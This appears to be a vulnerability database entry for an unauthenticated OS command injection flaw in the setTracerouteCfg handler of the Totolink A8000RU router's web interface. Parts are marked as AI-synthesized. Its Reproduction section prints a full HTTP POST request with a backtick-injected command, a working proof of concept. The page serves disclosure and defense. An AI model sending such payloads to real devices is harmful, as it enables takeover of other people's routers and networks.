Totolink A8000RU Web Management cstecgi.cgi setTracerouteCfg os command injection
Description
A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument command causes os command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Totolink A8000RU 7.1cu.643_b20200521 is vulnerable to OS command injection via the `command` parameter in the `setTracerouteCfg` function of `/cgi-bin/cstecgi.cgi`.
Vulnerability
The vulnerability resides in the /cgi-bin/cstecgi.cgi script of the Totolink A8000RU router (firmware version 7.1cu.643_b20200521). The setTracerouteCfg function reads a user-supplied command parameter, inserts it into a buffer via snprintf, and passes it to CsteSystem, which ultimately calls execv(). The input is not sanitized or validated, allowing arbitrary OS command injection. The affected firmware was downloaded from the vendor's official download page [1].
Exploitation
An unauthenticated remote attacker can send a crafted HTTP POST request to /cgi-bin/cstecgi.cgi with a JSON payload containing a malicious command value. The public proof-of-concept (PoC) demonstrates sending command as ` ls>./setTracerouteCfg.txt (backtick-delimited), which causes the router to execute the ls` command and write its output to a file [1]. No authentication or prior access is required; the exploitation is carried out over the network.
Impact
Successful exploitation allows the attacker to execute arbitrary operating system commands on the router with the privileges of the web server (likely root). This can lead to full device compromise, including data exfiltration, installation of persistent backdoors, lateral movement within the network, and disruption of device operations. The CIA triad is completely undermined [1].
Mitigation
As of the reference publication date (2026-05-24), no official patch or updated firmware has been released by Totolink. Users are advised to restrict remote access to the web management interface, place the device behind a firewall, and monitor for any vendor updates. If the device is no longer supported, replacement with a currently supported model may be necessary. This vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation on the `command` parameter allows arbitrary OS commands to be injected and executed via `execv()`."
Attack vector
An unauthenticated remote attacker sends a crafted POST request to `/cgi-bin/cstecgi.cgi` with a JSON body containing the `topicurl` set to `setTracerouteCfg` and a `command` parameter that includes arbitrary OS commands wrapped in backticks. The `command` value is passed unsanitized through `snprintf` into a buffer that is later executed by `execv()` in `CsteSystem`, resulting in OS command injection [ref_id=1]. No authentication or special privileges are required beyond network access to the router's web interface.
Affected code
The vulnerability resides in the function `sub_423E20` within `/cgi-bin/cstecgi.cgi` of the Web Management Interface. This function reads a user-provided parameter named `command` and inserts it into a buffer `v6` using `snprintf`. The buffer `v6` is then passed to `CsteSystem`, which ultimately executes the string via `execv()` [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory does not include a vendor fix or remediation guidance. To close this vulnerability, the vendor would need to implement input validation and sanitization on the `command` parameter before it is passed to `snprintf` and subsequently to `CsteSystem`, or avoid passing user-controlled strings to OS execution functions entirely [ref_id=1].
Preconditions
- networkAttacker must have network access to the router's web management interface (typically on port 80/443).
- authNo authentication is required; the PoC does not include any authentication step beyond a session cookie which may be optional.
Reproduction
Send the following HTTP POST request to the router's `/cgi-bin/cstecgi.cgi` endpoint:
``` POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 77 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=2:1772465702:2 Connection: keep-alive
{"topicurl":"setTracerouteCfg","command":"`ls>./setTracerouteCfg.txt`"} ```
After submitting, a file named `setTracerouteCfg.txt` is created in the current directory containing the directory listing, confirming command execution [ref_id=1].
Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_332/README.mdmitreexploit
- vuldb.com/submit/813431mitrethird-party-advisory
- vuldb.com/vuln/365348mitrevdb-entrytechnical-description
- vuldb.com/vuln/365348/ctimitresignaturepermissions-required
- www.totolink.netmitreproduct
News mentions
0No linked articles in our index yet.